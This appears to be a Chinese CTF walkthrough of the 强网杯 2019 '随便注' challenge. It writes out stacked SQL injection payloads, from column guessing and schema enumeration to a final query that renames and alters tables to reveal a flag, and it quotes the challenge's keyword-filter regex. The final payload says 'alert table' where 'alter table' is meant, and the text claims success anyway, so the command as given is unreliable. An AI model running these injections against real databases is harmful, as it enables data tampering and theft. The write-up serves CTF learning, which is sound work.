首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-05-20 14:49:01
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
愛麗絲夢遊仙境作者故事簡介
愛麗絲夢遊仙境作者故事簡介
《愛麗絲夢遊仙境》一部充滿荒誕卻又奇妙的童話故事,它的主角是一個小姑娘,因為追趕那隻會說話的小兔子而進入神奇空間。說起來,這個故事确實很簡單,可真要追述原型,恐怕就會讓你産生另外的感受了:愛的禮物。這是作者自己的原話,他認為這是一份愛,隻不...
2026-05-20
跖疣最簡單自然消失
跖疣最簡單自然消失
跖疣最簡單自然消失?起始篇:跖疣常見症狀,我來為大家科普一下關于跖疣最簡單自然消失?下面希望有你要的答案,我們一起來看看吧!跖疣最簡單自然消失起始篇:跖疣常見症狀跖疣初期多為透明角質,是由病毒感染引起導緻的。會随着免疫力低下或者細小傷口接種...
2026-05-20
比較有靈氣的女生名字
比較有靈氣的女生名字
比較有靈氣的女生名字?雯钰、冬瓊、永怡、姝慧、珂嘉、夢如、婷方、雪菲、佳琪、怡熹、盈婷、璐瑤、夏萱,下面我們就來說一說關于比較有靈氣的女生名字?我們一起去了解并探讨一下這個問題吧!比較有靈氣的女生名字雯钰、冬瓊、永怡、姝慧、珂嘉、夢如、婷方...
2026-05-20
屬鼠人生于幾月命最苦
屬鼠人生于幾月命最苦
古人雲“既來之,則安之”。這句話是很有道理的,命運把我帶到這個地方,是他的深意的。我不能因為他将我脫離了原有的軌迹就狂躁不安,甚至放棄。人生是一條很長的路,我們每個人都是行走的人,無論你走的好與不好,你都要走下去,面朝前方的走下去,心态積極...
2026-05-20
基層服務人員有沒有編制
基層服務人員有沒有編制
大學生“争搶”事業編制環衛工,一名研究生學曆的環衛工人在巡街保潔王建威攝基層政府承擔着各項政策實施落地的重擔,工作任務繁重,但目前不少單位和鄉鎮人手緊張,需要在編制之外通過公益性崗位、人事代理、勞務派遣等方式招聘編外人員進行補充,甚至有些機...
2026-05-20
Copyright 2023-2026 - www.tftnews.com All Rights Reserved